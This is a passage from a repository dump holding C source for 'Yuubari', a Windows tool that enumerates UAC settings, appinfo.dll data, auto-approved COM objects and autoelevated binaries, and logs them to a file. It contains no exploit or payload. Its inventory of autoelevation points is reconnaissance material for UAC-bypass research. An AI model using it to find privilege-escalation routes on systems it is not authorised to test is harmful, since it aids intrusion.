    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       LOGGER.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* LoggerCreate\n*\n* Purpose:\n*\n* Create log file.\n*\n*/\nHANDLE LoggerCreate(\n    _In_opt_ LPWSTR lpLogFileName\n)\n{\n    WCHAR ch;\n    LPWSTR fname = lpLogFileName;\n    HANDLE hFile;\n    DWORD bytesIO, lastError;\n\n    if (lpLogFileName == NULL) {\n        fname = TEXT(\"log.log\");\n    }\n\n    hFile = CreateFile(fname, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS,\n        FILE_ATTRIBUTE_NORMAL, NULL);\n\n    if (hFile != INVALID_HANDLE_VALUE) {\n        ch = (WCHAR)0xFEFF;\n\n        if (!WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL)) {\n            lastError = GetLastError();\n            CloseHandle(hFile);\n            SetLastError(lastError);\n            return INVALID_HANDLE_VALUE;\n        }\n    }\n    return hFile;\n}\n\n/*\n* LoggerWrite\n*\n* Purpose:\n*\n* Output text to file.\n*\n*/\nVOID LoggerWrite(\n    _In_ HANDLE hLogFile,\n    _In_ LPWSTR lpText,\n    _In_ BOOL UseReturn\n)\n{\n    SIZE_T textLength = 0, bufferSize = 0;\n    DWORD bytesIO = 0;\n    LPWSTR Buffer = NULL;\n\n    if (lpText == NULL)\n        return;\n\n    textLength = _strlen(lpText);\n    if (textLength == 0)\n        return;\n\n    if (hLogFile != INVALID_HANDLE_VALUE) {\n\n        if (UseReturn) {\n            if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 3)\n                return;\n            bufferSize = (textLength + 3) * sizeof(WCHAR);\n        }\n        else {\n            if 
(textLength > (SIZE_MAX / sizeof(WCHAR)) - 1)\n                return;\n            bufferSize = (textLength + 1) * sizeof(WCHAR);\n        }\n\n        Buffer = (LPWSTR)supHeapAlloc(bufferSize);\n        if (Buffer) {\n            _strcpy(Buffer, lpText);\n            if (UseReturn) _strcat(Buffer, TEXT(\"\\r\\n\"));\n            textLength = _strlen(Buffer);\n            WriteFile(hLogFile, Buffer, (DWORD)(textLength * sizeof(WCHAR)), &bytesIO, NULL);\n            supHeapFree(Buffer);\n        }\n    }\n}\n"
  },
  {
    "path": "Source/Yuubari/logger.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2017\n*\n*  TITLE:       LOGGER.H\n*\n*  VERSION:     1.0F\n*\n*  DATE:        13 Feb 2017\n*\n*  Header file for the log file writter.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nHANDLE LoggerCreate(\n    _In_opt_ LPWSTR lpLogFileName\n    );\n\nVOID LoggerWrite(\n    _In_ HANDLE hLogFile,\n    _In_ LPWSTR lpText,\n    _In_ BOOL UseReturn\n    );\n"
  },
  {
    "path": "Source/Yuubari/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.61\n*\n*  DATE:        12 Feb 2026\n*\n*  Program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"Shlobj.h\"\n\nBOOL    g_VerboseOutput = FALSE;\nULONG   g_NtBuildNumber = 0;\nHANDLE  g_LogFile = INVALID_HANDLE_VALUE;\n\nVOID LoggerWriteHeader(\n    _In_ LPWSTR lpHeaderData)\n{\n    LoggerWrite(g_LogFile, T_SPLIT, FALSE);\n    LoggerWrite(g_LogFile, lpHeaderData, FALSE);\n    LoggerWrite(g_LogFile, T_SPLIT, TRUE);\n}\n\n/*\n* AppInfoDataOutputCallback\n*\n* Purpose:\n*\n* Output callback for AppInfo scan.\n*\n*/\nVOID AppInfoDataOutputCallback(\n    _In_ UAC_AI_DATA* Data\n)\n{\n    LPWSTR lpLog = NULL, Text = NULL;\n    SIZE_T sz = 0, textLen, nameLen, bufferChars;\n\n    if (Data == NULL)\n        return;\n\n    sz = (_strlen(Data->Name) * sizeof(WCHAR));\n    if (sz == 0 || sz > MAXDWORD - MAX_PATH)\n        return;\n\n    sz += MAX_PATH;\n\n    lpLog = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz);\n    if (lpLog) {\n        switch (Data->Type) {\n        case AiSnapinFile:\n            Text = TEXT(\"SnapinFile: \");\n            break;\n        case AiManagementConsole:\n            Text = TEXT(\"ManagementConsole: \");\n            break;\n        case AiAutoApproveEXE:\n            Text = TEXT(\"AutoApproveEXE: \");\n            break;\n        case AiIncludedPFDirs:\n            Text = TEXT(\"IncludedPFDir: \");\n            break;\n        case AiIncludedSystemDirs:\n            Text = TEXT(\"IncludedSystemDir: \");\n            break;\n        
case AiExemptedAutoApproveExes:\n            Text = TEXT(\"ExemptedAutoApproveExe: \");\n            break;\n        case AilpIncludedWindowsDirs:\n            Text = TEXT(\"IncludedWindowsDirs: \");\n            break;\n        case AiExcludedWindowsDirs:\n            Text = TEXT(\"ExcludedWindowsDir: \");\n            break;\n        default:\n            Text = TEXT(\"Unknown \");\n            break;\n        }\n\n        _strcpy(lpLog, Text);\n\n        textLen = _strlen(Text);\n        nameLen = _strlen(Data->Name);\n        bufferChars = sz / sizeof(WCHAR);\n\n        if (textLen + nameLen < bufferChars) {\n            _strcat(lpLog, Data->Name);\n            LoggerWrite(g_LogFile, lpLog, TRUE);\n            cuiPrintText(lpLog, TRUE);\n        }\n\n        HeapFree(GetProcessHeap(), 0, lpLog);\n    }\n}\n\n/*\n* BasicDataOutputCallback\n*\n* Purpose:\n*\n* Output callback for basic UAC settings scan.\n*\n*/\nVOID WINAPI BasicDataOutputCallback(\n    _In_ UAC_BASIC_DATA* Data\n)\n{\n    LPWSTR lpLog = NULL;\n    SIZE_T sz = 0;\n\n    if (Data == NULL)\n        return;\n\n    sz = (_strlen(Data->Name) * sizeof(WCHAR)) + MAX_PATH;\n    lpLog = (LPWSTR)supHeapAlloc(sz);\n    if (lpLog) {\n        _strcpy(lpLog, Data->Name);\n        _strcat(lpLog, TEXT(\"=\"));\n        if (Data->IsValueBool) {\n            if (Data->Value == 0)\n                _strcat(lpLog, TEXT(\"Disabled\"));\n            else\n                _strcat(lpLog, TEXT(\"Enabled\"));\n        }\n        else {\n            ultostr(Data->Value, _strend(lpLog));\n        }\n        LoggerWrite(g_LogFile, lpLog, TRUE);\n        cuiPrintText(lpLog, TRUE);\n        supHeapFree(lpLog);\n    }\n}\n\n/*\n* RegistryOutputCallback\n*\n* Purpose:\n*\n* Output callback for registry autoelevated objects scan.\n*\n*/\nVOID WINAPI RegistryOutputCallback(\n    _In_ UAC_REGISTRY_DATA* Data\n)\n{\n    UAC_INTERFACE_DATA* InterfaceData;\n    LPOLESTR OutputString = NULL;\n\n    if (Data == NULL)\n        return;\n\n 
   if (Data->DataType == UacCOMDataVirtualFactory) {\n        LoggerWrite(g_LogFile, TEXT(\"VirtualFactory\"), TRUE);\n    }\n    if ((Data->DataType == UacCOMDataCommonType) ||\n        (Data->DataType == UacCOMDataVirtualFactory))\n    {\n        //\n        // Output current registry key to show that we are alive.\n        //\n        if (Data->Name)\n            LoggerWrite(g_LogFile, Data->Name, TRUE);\n        if (Data->Key)\n            cuiPrintText(Data->Key, TRUE);\n        if (Data->AppId)\n            LoggerWrite(g_LogFile, Data->AppId, TRUE);\n        if (Data->LocalizedString)\n            LoggerWrite(g_LogFile, Data->LocalizedString, TRUE);\n\n        LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), TRUE);\n    }\n\n    if (Data->DataType == UacCOMDataInterfaceTypeVF) {\n        LoggerWrite(g_LogFile, TEXT(\"VirtualFactory Item\"), TRUE);\n    }\n\n    if ((Data->DataType == UacCOMDataInterfaceType) ||\n        (Data->DataType == UacCOMDataInterfaceTypeVF))\n    {\n        InterfaceData = (UAC_INTERFACE_DATA*)(PVOID)Data;\n        if (InterfaceData->Name) {\n            LoggerWrite(g_LogFile, InterfaceData->Name, TRUE);\n            cuiPrintText(InterfaceData->Name, TRUE);\n        }\n\n        if (StringFromCLSID(&InterfaceData->Clsid, &OutputString) == S_OK) {\n            LoggerWrite(g_LogFile, TEXT(\"CLSID\"), TRUE);\n            LoggerWrite(g_LogFile, OutputString, TRUE);\n            cuiPrintText(OutputString, TRUE);\n            CoTaskMemFree(OutputString);\n        }\n        if (StringFromIID(&InterfaceData->IID, &OutputString) == S_OK) {\n            LoggerWrite(g_LogFile, TEXT(\"IID\"), TRUE);\n            LoggerWrite(g_LogFile, OutputString, TRUE);\n            cuiPrintText(OutputString, TRUE);\n            CoTaskMemFree(OutputString);\n        }\n        LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), TRUE);\n        cuiPrintText(TEXT(\"\\r\\n\"), TRUE);\n    }\n}\n\n/*\n* FusionOutputCallback\n*\n* Purpose:\n*\n* Output callback for autoelevated 
applications scan.\n*\n*/\nVOID WINAPI FusionOutputCallback(\n    _In_ UAC_FUSION_DATA* Data\n)\n{\n    LPWSTR lpText;\n    LPWSTR lpLog = NULL;\n    SIZE_T sz = 0, keyNameLen, dllNameLen, prefixLen, bufferChars;\n    UAC_FUSION_DATA_DLL* Dll;\n\n    if (Data == NULL)\n        return;\n\n    if (Data->DataType == UacFusionDataCommonType) {\n\n        //\n        // Display only binaries with autoelevation flags if not in verbose output\n        //\n        if ((Data->AutoElevateState == AutoElevateUnspecified) && (g_VerboseOutput == FALSE))\n            return;\n\n        //\n        // Output current filename\n        //\n        LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), FALSE);\n        LoggerWrite(g_LogFile, Data->Name, TRUE);\n        cuiPrintText(Data->Name, TRUE);\n\n        //\n        // If application has autoElevate attribute, report full info\n        //\n        if (Data->IsFusion) {\n            switch (Data->RunLevel.RunLevel) {\n            case ACTCTX_RUN_LEVEL_AS_INVOKER:\n                lpText = TEXT(\"asInvoker\");\n                break;\n            case ACTCTX_RUN_LEVEL_HIGHEST_AVAILABLE:\n                lpText = TEXT(\"highestAvailable\");\n                break;\n            case ACTCTX_RUN_LEVEL_REQUIRE_ADMIN:\n                lpText = TEXT(\"requireAdministrator\");\n                break;\n            case ACTCTX_RUN_LEVEL_UNSPECIFIED:\n            default:\n                lpText = TEXT(\"unspecified\");\n                break;\n            }\n            //RequestedExecutionLevel \n            LoggerWrite(g_LogFile, lpText, TRUE);\n\n            if (Data->RunLevel.UiAccess > 0) {\n                lpText = TEXT(\"uiAccess=TRUE\");\n            }\n            else {\n                lpText = TEXT(\"uiAccess=FALSE\");\n            }\n            //UIAccess state\n            LoggerWrite(g_LogFile, lpText, TRUE);\n\n            //autoElevate state\n            if (Data->AutoElevateState != AutoElevateUnspecified) {\n                switch 
(Data->AutoElevateState) {\n                case AutoElevateEnabled:\n                    lpText = TEXT(\"autoElevate=TRUE\");\n                    break;\n                case AutoElevateDisabled:\n                    lpText = TEXT(\"autoElevate=FALSE\");\n                    break;\n                case AutoElevateExempted:\n                    lpText = TEXT(\"autoElevate=Exempted\");\n                    break;\n                default:\n                    break;\n                }\n                LoggerWrite(g_LogFile, lpText, TRUE);\n            }\n        }\n        else {\n            // no embedded manifest\n            lpText = TEXT(\"Binary without embedded manifest\");\n            LoggerWrite(g_LogFile, lpText, TRUE);\n            if (Data->IsOSBinary) {\n                if (Data->IsSignatureValidOrTrusted == FALSE) {\n                    lpText = TEXT(\"Warning: signature not valid or trusted\");\n                    LoggerWrite(g_LogFile, lpText, TRUE);\n                }\n                else {\n                    lpText = TEXT(\"OS binary with valid digital signature\");\n                    LoggerWrite(g_LogFile, lpText, TRUE);\n                }\n            }\n        }\n        if (Data->IsDotNet) {\n            lpText = TEXT(\"DotNet\");\n            LoggerWrite(g_LogFile, lpText, TRUE);\n        }\n    }\n    if (Data->DataType == UacFusionDataRedirectedDllType) {\n        Dll = (UAC_FUSION_DATA_DLL*)Data;\n\n        if (Dll->DllName == NULL || Dll->KeyName == NULL)\n            return;\n\n        keyNameLen = _strlen(Dll->KeyName);\n        dllNameLen = _strlen(Dll->DllName);\n\n        // Bound the character count so that sz * sizeof(WCHAR) below cannot wrap.\n        if (keyNameLen == 0 || dllNameLen == 0 || keyNameLen > (MAXDWORD / sizeof(WCHAR)) - dllNameLen - MAX_PATH)\n            return;\n\n        // sz is a WCHAR count; supHeapAlloc takes a byte count.\n        sz = keyNameLen + dllNameLen + MAX_PATH;\n        lpLog = (LPWSTR)supHeapAlloc(sz * sizeof(WCHAR));\n        if (lpLog) {\n            bufferChars = sz;\n\n            _strcpy(lpLog, TEXT(\"DllRedirection: \"));\n            prefixLen = 
_strlen(TEXT(\"DllRedirection: \"));\n\n            if (prefixLen + keyNameLen + 4 + dllNameLen < bufferChars) {\n                _strcat(lpLog, Dll->KeyName); // original DLL name from KeyName\n                _strcat(lpLog, TEXT(\" -> \"));\n                _strcat(lpLog, Dll->DllName); // redirected DLL path\n\n                LoggerWrite(g_LogFile, lpLog, TRUE);\n            }\n\n            supHeapFree(lpLog);\n        }\n    }\n}\n\n/*\n* ListBasicSettings\n*\n* Purpose:\n*\n* Scan basic UAC settings.\n*\n*/\nVOID ListBasicSettings(\n    VOID\n)\n{\n    cuiPrintText(T_BASIC_HEAD, TRUE);\n    LoggerWriteHeader(T_BASIC_HEAD);\n    ScanBasicUacData((OUTPUTCALLBACK)BasicDataOutputCallback);\n}\n\n/*\n* ListCOMFromRegistry\n*\n* Purpose:\n*\n* Scan HKEY_CLASSES_ROOT for autoelevated COM objects.\n*\n*/\nVOID ListCOMFromRegistry(\n    VOID\n)\n{\n    INTERFACE_INFO_LIST InterfaceList;\n    HRESULT hr;\n\n    hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n    if (FAILED(hr))\n        return;\n\n    RtlSecureZeroMemory(&InterfaceList, sizeof(InterfaceList));\n\n    __try {\n        if (!CoEnumInterfaces(&InterfaceList))\n            __leave;\n\n        cuiPrintText(T_COM_HEAD, TRUE);\n        LoggerWriteHeader(T_COM_HEAD);\n        CoListInformation((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n\n        //\n        // AutoApproval COM list added since RS1.\n        //\n        if (g_NtBuildNumber >= NT_WIN10_REDSTONE1) {\n            cuiPrintText(T_COM_APPROVE_HEAD, TRUE);\n            LoggerWriteHeader(T_COM_APPROVE_HEAD);\n            CoScanAutoApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n        }\n        cuiPrintText(T_BROKER_APPROVE_HEAD, TRUE);\n        LoggerWriteHeader(T_BROKER_APPROVE_HEAD);\n        CoScanBrokerApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n    }\n    __finally {\n        if (InterfaceList.List)\n            supHeapFree(InterfaceList.List);\n        if (hr == S_OK)\n     
       CoUninitialize();\n    }\n}\n\n/*\n* ListFusion\n*\n* Purpose:\n*\n* Scan Windows directory for autoelevated apps.\n*\n*/\nVOID ListFusion(\n    VOID\n)\n{\n    HMODULE hModule;\n    WCHAR   szPath[MAX_PATH * 2];\n\n    RtlSecureZeroMemory(szPath, sizeof(szPath));\n    _strcpy(szPath, USER_SHARED_DATA->NtSystemRoot);\n    _strcat(szPath, TEXT(\"\\\\system32\\\\wintrust.dll\"));\n\n    hModule = LoadLibraryEx(szPath, NULL, 0);\n    if (hModule != NULL) {\n        WTGetSignatureInfo = (ptrWTGetSignatureInfo)GetProcAddress(hModule, \"WTGetSignatureInfo\");\n    }\n\n    //scan Windows first\n    cuiPrintText(T_WINFILES_HEAD, TRUE);\n    LoggerWriteHeader(T_WINFILES_HEAD);\n    /*\n#ifdef _DEBUG\n    FusionScanDirectory(L\"C:\\\\Windows\\\\system32\", (OUTPUTCALLBACK)FusionOutputCallback);\n    return;\n#else*/\n    FusionScanDirectory(USER_SHARED_DATA->NtSystemRoot, (OUTPUTCALLBACK)FusionOutputCallback);\n\n    //scan program files next\n    cuiPrintText(T_PFDIRFILES_HEAD, TRUE);\n    LoggerWriteHeader(T_PFDIRFILES_HEAD);\n\n    RtlSecureZeroMemory(szPath, sizeof(szPath));\n    if (SUCCEEDED(SHGetFolderPath(NULL,\n        CSIDL_PROGRAM_FILES,\n        NULL,\n        SHGFP_TYPE_CURRENT,\n        (LPWSTR)&szPath)))\n    {\n        FusionScanDirectory(szPath, (OUTPUTCALLBACK)FusionOutputCallback);\n    }\n    //#endif\n}\n\n/*\n* ListAppInfo\n*\n* Purpose:\n*\n* Scan memory of appinfo.dll.\n*\n*/\nVOID ListAppInfo(\n    VOID\n)\n{\n    WCHAR szFileName[MAX_PATH * 2];\n\n    cuiPrintText(T_APPINFO_HEAD, TRUE);\n    LoggerWriteHeader(T_APPINFO_HEAD);\n\n    /*#ifndef _DEBUG*/\n    _strcpy(szFileName, USER_SHARED_DATA->NtSystemRoot);\n    _strcat(szFileName, TEXT(\"\\\\system32\\\\appinfo.dll\"));\n    /*#else\n        _strcpy(szFileName, TEXT(\"C:\\\\appinfo\\\\19041.dll\"));\n    #endif*/\n    ScanAppInfo(szFileName, (OUTPUTCALLBACK)AppInfoDataOutputCallback);\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nVOID main()\n{\n    ULONG l = 0;\n    
WCHAR szBuffer[MAX_PATH + 1];\n    RTL_OSVERSIONINFOW  osv;\n\n    __security_init_cookie();\n\n    HeapSetInformation(GetProcessHeap(), HeapEnableTerminationOnCorruption, NULL, 0);\n\n    cuiInitialize(FALSE, NULL);\n\n    cuiPrintText(T_PROGRAM_TITLE, TRUE);\n\n    RtlSecureZeroMemory(&osv, sizeof(osv));\n    osv.dwOSVersionInfoSize = sizeof(osv);\n    RtlGetVersion((RTL_OSVERSIONINFOW*)&osv);\n\n    g_NtBuildNumber = osv.dwBuildNumber;\n\n    if (g_NtBuildNumber < YUUBARI_MIN_SUPPORTED_NT_BUILD) {\n        cuiPrintText(TEXT(\"[UacView] Unsupported Windows version.\"), TRUE);\n        ExitProcess(0);\n    }\n    if (g_NtBuildNumber > YUUBARI_MAX_SUPPORTED_NT_BUILD) {\n        cuiPrintText(TEXT(\"\\r\\n[UacView] Not all features available for this build\\r\\n\"), TRUE);\n    }\n\n    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n    GetCommandLineParam(GetCommandLine(), 1, (LPWSTR)&szBuffer, MAX_PATH, &l);\n    if (_strcmpi(szBuffer, TEXT(\"/?\")) == 0) {\n        MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAM_NAME, MB_ICONINFORMATION);\n        ExitProcess(0);\n    }\n    else {\n        g_VerboseOutput = (_strcmpi(szBuffer, TEXT(\"/v\")) == 0);\n    }\n\n    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n    _strcpy(szBuffer, TEXT(\"uac\"));\n    ultostr(g_NtBuildNumber, _strend(szBuffer));\n    _strcat(szBuffer, TEXT(\".log\"));\n\n    g_LogFile = LoggerCreate(szBuffer);\n    if (g_LogFile != INVALID_HANDLE_VALUE) {\n        cuiPrintText(TEXT(\"Output will be logged to the file\"), TRUE);\n        cuiPrintText(szBuffer, TRUE);\n    }\n\n    ListBasicSettings();\n    ListAppInfo();\n    ListCOMFromRegistry();\n    ListFusion();\n\n    if (g_LogFile != INVALID_HANDLE_VALUE)\n        CloseHandle(g_LogFile);\n\n    ExitProcess(0);\n}\n"
  },
  {
    "path": "Source/Yuubari/sup.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       SUP.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* supIsCorImageFile\n*\n* Purpose:\n*\n* Return true if image has CliHeader entry, false otherwise.\n*\n*/\nBOOL supIsCorImageFile(\n    _In_ PVOID ImageBase\n)\n{\n    ULONG               sz = 0;\n    IMAGE_COR20_HEADER* CliHeader;\n\n    CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n    return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));\n}\n\n/*\n* supReadKeyString\n*\n* Purpose:\n*\n* Read string value from registry key.\n*\n*/\nLPWSTR supReadKeyString(\n    _In_ HKEY hKey,\n    _In_ LPWSTR KeyValue,\n    _In_ PDWORD pdwDataSize\n    )\n{\n    LRESULT lRet;\n    LPWSTR  lpString = NULL;\n\n    if (pdwDataSize == NULL)\n        return NULL;\n\n    lRet = RegQueryValueEx(hKey, KeyValue, NULL,\n        NULL, NULL, pdwDataSize);\n    if (lRet == ERROR_SUCCESS) {\n        lpString = (LPWSTR)supHeapAlloc(*pdwDataSize);\n        if (lpString != NULL) {\n            lRet = RegQueryValueEx(hKey, KeyValue, NULL,\n                NULL, (LPBYTE)lpString, pdwDataSize);\n            if (lRet != ERROR_SUCCESS) {\n                supHeapFree(lpString);\n                lpString = NULL;\n            }\n        }\n    }\n    return lpString;\n}\n\n/*\n* supQueryKeyName\n*\n* Purpose:\n*\n* Get key name from handle.\n*\n*/\nPVOID supQueryKeyName(\n    _In_ HKEY hKey,\n    _Out_opt_ PSIZE_T ReturnedLength\n    )\n{\n  
  NTSTATUS    status;\n    ULONG       ulen = 0;\n    SIZE_T      sz = 0;\n    PVOID       ReturnBuffer = NULL;\n\n    POBJECT_NAME_INFORMATION pObjName = NULL;\n\n    if (ReturnedLength)\n        *ReturnedLength = 0;\n\n    NtQueryObject(hKey, ObjectNameInformation, NULL, 0, &ulen);\n    pObjName = (POBJECT_NAME_INFORMATION)supHeapAlloc(ulen);\n    if (pObjName) {\n        status = NtQueryObject(hKey, ObjectNameInformation, pObjName, ulen, NULL);\n        if (NT_SUCCESS(status)) {\n            if ((pObjName->Name.Buffer != NULL) && (pObjName->Name.Length > 0)) {\n                sz = pObjName->Name.Length + sizeof(UNICODE_NULL);\n                ReturnBuffer = supHeapAlloc(sz);\n                if (ReturnBuffer) {\n                    RtlCopyMemory(ReturnBuffer, pObjName->Name.Buffer, pObjName->Name.Length);\n                    if (ReturnedLength)\n                        *ReturnedLength = sz;\n                }\n            }\n        }\n        supHeapFree(pObjName);\n    }\n    return ReturnBuffer;\n}\n\n/*\n* supIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN supIsProcess32bit(\n    _In_ HANDLE hProcess\n    )\n{\n    NTSTATUS status;\n    PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n    if (hProcess == NULL) {\n        return FALSE;\n    }\n\n    //query if this is wow64 process\n    RtlSecureZeroMemory(&pebi, sizeof(pebi));\n    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n    if (NT_SUCCESS(status)) {\n        return (pebi.IsWow64Process == 1);\n    }\n    return FALSE;\n}\n\n/*\n* supFindPattern\n*\n* Purpose:\n*\n* Lookup pattern in buffer.\n*\n*/\nPVOID supFindPattern(\n    _In_ CONST PBYTE Buffer,\n    _In_ SIZE_T BufferSize,\n    _In_ CONST PBYTE Pattern,\n    _In_ SIZE_T PatternSize\n)\n{\n    PBYTE p0 = Buffer, pnext;\n\n    if (PatternSize == 0)\n        return NULL;\n\n  
  if (BufferSize < PatternSize)\n        return NULL;\n\n    do {\n        pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);\n        if (pnext == NULL)\n            break;\n\n        BufferSize -= (ULONG_PTR)(pnext - p0);\n\n        if (BufferSize < PatternSize)\n            return NULL;\n\n        if (memcmp(pnext, Pattern, PatternSize) == 0)\n            return pnext;\n\n        p0 = pnext + 1;\n        --BufferSize;\n    } while (BufferSize > 0);\n\n    return NULL;\n}\n\n/*\n* supRegReadDword\n*\n* Purpose:\n*\n* Read DWORD value from given key.\n*\n*/\nLRESULT supRegReadDword(\n    _In_ HKEY hKey,\n    _In_ LPWSTR lpValueName,\n    _In_ LPDWORD Value\n)\n{\n    LRESULT lResult;\n    DWORD dwValue = 0, bytesIO;\n\n    bytesIO = sizeof(DWORD);\n    lResult = RegQueryValueEx(hKey, lpValueName,\n        NULL, NULL,\n        (LPBYTE)&dwValue, &bytesIO);\n\n    if (lResult == ERROR_SUCCESS) {\n        if (Value)\n            *Value = dwValue;\n    }\n    return lResult;\n}\n\n/*\n* supLookupImageSectionByName\n*\n* Purpose:\n*\n* Lookup section pointer and size for section name.\n*\n*/\nPVOID supLookupImageSectionByName(\n    _In_ CHAR* SectionName,\n    _In_ ULONG SectionNameLength,\n    _In_ PVOID DllBase,\n    _Out_ PULONG SectionSize\n)\n{\n    BOOLEAN bFound = FALSE;\n    ULONG i;\n    PVOID Section;\n    IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);\n    IMAGE_SECTION_HEADER* SectionTableEntry;\n\n    //\n    // Assume failure.\n    //\n    if (SectionSize)\n        *SectionSize = 0;\n\n    if (NtHeaders == NULL)\n        return NULL;\n\n    SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +\n        sizeof(ULONG) +\n        sizeof(IMAGE_FILE_HEADER) +\n        NtHeaders->FileHeader.SizeOfOptionalHeader);\n\n    //\n    // Locate section.\n    //\n    i = NtHeaders->FileHeader.NumberOfSections;\n    while (i > 0) {\n\n        if (_strncmp_a(\n        (CHAR*)SectionTableEntry->Name,\n            SectionName,\n            
SectionNameLength) == 0)\n        {\n            bFound = TRUE;\n            break;\n        }\n\n        i -= 1;\n        SectionTableEntry += 1;\n    }\n\n    //\n    // Section not found, abort scan.\n    //\n    if (!bFound)\n        return NULL;\n\n    Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);\n    if (SectionSize)\n        *SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n    return Section;\n}\n\n/*\n* supConcatenatePaths\n*\n* Purpose:\n*\n* Concatenate 2 paths.\n*\n*/\nBOOL supConcatenatePaths(\n    _Inout_ LPWSTR Target,\n    _In_ LPCWSTR Path,\n    _In_ SIZE_T TargetBufferSize\n)\n{\n    SIZE_T TargetLength, PathLength;\n    BOOL NeedSeparator;\n    SIZE_T EndingLength;\n    SIZE_T i;\n\n    if (Target == NULL || Path == NULL || TargetBufferSize == 0)\n        return FALSE;\n\n    // Find current target length.\n    TargetLength = 0;\n    while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)\n        TargetLength++;\n\n    if (TargetLength >= TargetBufferSize)\n        return FALSE;\n\n    // Strip trailing backslash from target, but preserve a lone backslash.\n    if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\\\')) {\n        // Do not strip if the target is exactly a single backslash.\n        if (!(TargetLength == 1 && Target[0] == TEXT('\\\\')))\n        {\n            TargetLength--;\n        }\n    }\n\n    // Strip leading backslash from path only if target is non‑empty.\n    if (TargetLength > 0 && Path[0] == TEXT('\\\\'))\n        Path++;\n\n    // Find path length (after possible stripping).\n    PathLength = 0;\n    while (Path[PathLength] != 0)\n        PathLength++;\n\n    // Determine if a separator is needed based on target's last character.\n    NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\\\'));\n\n    EndingLength = TargetLength + (NeedSeparator ? 
1 : 0) + PathLength + 1;\n\n    if (EndingLength > TargetBufferSize)\n        return FALSE;\n\n    // Insert separator if needed.\n    if (NeedSeparator) {\n        Target[TargetLength] = TEXT('\\\\');\n        TargetLength++;\n    }\n\n    // Copy the path.\n    for (i = 0; i < PathLength; i++)\n        Target[TargetLength + i] = Path[i];\n\n    Target[TargetLength + PathLength] = 0;\n    return TRUE;\n}\n"
  },
  {
    "path": "Source/Yuubari/sup.h",
